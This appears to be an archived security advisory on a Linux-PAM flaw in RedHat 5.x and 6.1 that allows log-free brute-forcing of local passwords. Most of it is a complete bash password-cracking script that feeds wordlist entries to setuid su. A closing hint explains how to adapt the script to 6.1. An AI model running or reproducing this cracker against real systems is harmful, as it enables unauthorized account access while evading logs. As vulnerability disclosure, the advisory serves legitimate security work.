COMMAND

    pam

SYSTEMS AFFECTED

    RedHat 5.x

PROBLEM

    Michal  Zalewski  made  following.   It's  brute-force   Linux-PAM
    password cracker for  RedHat.  Supply  a wordlist, take  a coffee.
    Nothing in system logs.  Performance-tuning possible.

    A vulnerability /feature?  in PAM shipped  with RedHat 6.1  allows
    attacker  to  perform  rapid  brute-force password cracking attack
    without any evidence in system logs.

    #!/bin/bash

    # (c) 1999/2000 <lcamtuf@ids.pl>
    # ------------------------------
    #
    # Requirements:
    #
    # - working /bin/su
    # - recent PAM implementation (tested with RedHat 5.x)
    # - 'usleep' command and bash 1.14.x or 2.0.x
    #

    DESTACC='testy'   # Account to crack
    WORDFILE='words'  # Wordfile with passwords to test

    KILLDELAY=03      # Delay (in 1/10 sec) to wait for su (<10)

    # End of setup.

    clear
    echo "RedHat - NothingInLogs[tm] BruteForce(R) Password Crack"
    echo "-------------------------------------------------------"
    echo "  - (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> -  "
    echo

    if [ ! "$1" = "" ]; then
      DESTACC="$1"
    fi

    KD=$[KILLDELAY*100000]

    echo "[+] Configured against user '$DESTACC', wordfile: $WORDFILE"
    echo "[+] Kill-delay set to $KD usecs..."


    id "$DESTACC" &>/dev/null

    if [ ! "$?" = "0" ]; then
      echo "[-] Hmm, user '$DESTACC' not found, paranoia?"
      echo
      exit 0
    fi

    SHL="`grep "^$DESTACC:" /etc/passwd|awk -F: '{print $7}'`"

    if [ ! "$SHL" = "/bin/bash" ]; then
      echo "[-] Hmm, user '$DESTACC' has $SHL set as shell, expect problems..."
    fi

    echo "[+] Destination account is alive and well..."

    if [ ! -f "$WORDFILE" ]; then
      echo "[-] Wordfile '$WORDFILE' not found, check it."
      echo
      exit 0
    fi

    if [ ! -u /bin/su ]; then
      echo "[-] Can't find +s on /bin/su, hack me."
      echo
      exit 0
    fi

    if [ ! -x /bin/su ]; then
      echo "[-] Haven't +x on /bin/su, hack me."
      echo
      exit 0
    fi

    echo "[+] /bin/su seems to be executable and setuid, hopefully it works..."

    if [ ! -x /bin/usleep ]; then
      echo "[-] No /bin/usleep in this system. Be a hacker."
      echo
      exit 0
    fi

    if [ "$UID" = "0" ]; then
      echo "[-] Root?! You idiot..."
      echo
      exit 0
    fi

    echo "[+] Let's go straight to number one..."

    LNS="`cat $WORDFILE | wc -l|awk '{print $1}'`"
    CNT=0

    echo "[+] Wordfile '$WORDFILE' loaded - $LNS passwords..."
    echo "[+] Estimated time: $[LNS*KILLDELAY/25] secs, max: $[LNS*KILLDELAY/10] secs."

    while [ "$CNT" -lt "$LNS" ]; do
      CNT=$[CNT+1]
      PASS="`head -$CNT $WORDFILE|tail -1`"
      echo -ne "[?] Trying '$PASS' ($CNT/$LNS)...                \r"
      echo "$PASS" | su "$DESTACC" &>/dev/null &
      usleep $KD
      kill -9 $! &>/dev/null
      if [ ! "$?" = "0" ]; then
        echo
        echo "[*] Huh, it worked. I've tried password '$PASS' for '$DESTACC'."
        echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
        echo "[+] Thank You, and hope you enjoyed your stay."
        echo
        exit 0
      fi
    done

    echo "[*] Hmm, end of wordfile, but no matching passwords :("
    echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
    echo "[+] Bad day, try again tomorrow?"
    echo
    exit 0

    Use a  pseudoterminal to  make it  work on  6.1.   Expect is  your
    friend.

SOLUTION

    Nothing to do  with security...   It is already  fixed in Red  Hat
    6.1 - pam-0.68-7